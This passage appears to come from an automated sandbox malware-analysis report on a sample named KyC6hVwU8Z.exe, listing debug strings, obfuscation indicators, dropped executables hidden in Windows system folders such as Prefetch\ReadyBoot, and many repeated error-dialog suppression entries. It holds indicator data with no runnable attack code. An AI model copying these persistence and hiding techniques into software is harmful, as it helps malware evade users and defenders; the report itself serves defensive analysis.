                                Source: Binary string: wC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: mountvol.pdbGCTL source: KyC6hVwU8Z.exe, 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 7Up9zvGH4w.exe, 0000000A.00000000.2793610313.00007FF64C404000.00000002.00000001.01000000.00000006.sdmp, 7Up9zvGH4w.exe, 0000000A.00000002.2796201070.00007FF64C404000.00000002.00000001.01000000.00000006.sdmp, 7Up9zvGH4w.exe.6.dr
                                Source: Binary string: }C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb m^ source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000029B4000.00000004.00000800.00020000.00000000.sdmp

                                Data Obfuscation

                                barindex
                                Source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                                Source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, 857.cs.Net Code: _736
                                Source: KyC6hVwU8Z.exeStatic PE information: section name: .back
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001D0350 push eax; ret 0_2_001D1D4D
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001F57AE push ecx; ret 0_2_001F57C1
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001D0350 push eax; ret 5_2_001D1D4D
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001F57AE push ecx; ret 5_2_001F57C1
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_00428E7D push esi; ret 6_2_00428E86
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_004076E0 push ecx; ret 6_2_004076F3
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeCode function: 12_2_00007FF848F23CB9 push ebx; retf 12_2_00007FF848F23CBA
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeCode function: 12_2_00007FF848F3739D push ebp; retf 12_2_00007FF848F373A8
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeCode function: 12_2_00007FF848F37BAC push eax; ret 12_2_00007FF848F37BAD
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeCode function: 12_2_00007FF849100878 push esp; retf 12_2_00007FF849100879
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF848F4739D push ebp; retf 18_2_00007FF848F473A8
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF848F47BAC push eax; ret 18_2_00007FF848F47BAD
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF84911AAAD push eax; retf 18_2_00007FF84911AB6D
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF849115C5D push ebx; retf 18_2_00007FF849115C8A
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF84912733D push ebp; iretd 18_2_00007FF84912733F
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF84911ABB0 push eax; retf 18_2_00007FF84911AB6D
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF849115BBD push ebx; ret 18_2_00007FF849115BCA
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 18_2_00007FF8491136C4 push eax; iretd 18_2_00007FF8491136C5
                                Source: KyC6hVwU8Z.exeStatic PE information: section name: .text entropy: 7.0802944473385505

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeFile created: C:\Users\user\AppData\Roaming\7Up9zvGH4w.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Program Files\Reference Assemblies\Microsoft\Framework\PfjsOcNiQfAmiszo.exeJump to dropped file
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile created: C:\Users\user\Desktop\oUNDhiUw.logJump to dropped file
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile created: C:\Users\user\Desktop\dFZxqctW.logJump to dropped file
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeFile created: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Windows\Resources\Ease of Access Themes\PfjsOcNiQfAmiszo.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Program Files (x86)\Windows NT\Accessories\en-US\PfjsOcNiQfAmiszo.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Users\user\Desktop\yTUtFuTG.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Users\user\Desktop\luKnOVOf.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Windows\Resources\Ease of Access Themes\PfjsOcNiQfAmiszo.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Users\user\Desktop\yTUtFuTG.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile created: C:\Users\user\Desktop\luKnOVOf.logJump to dropped file
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile created: C:\Users\user\Desktop\oUNDhiUw.logJump to dropped file
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile created: C:\Users\user\Desktop\dFZxqctW.logJump to dropped file
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001F57E2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001F57E2
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
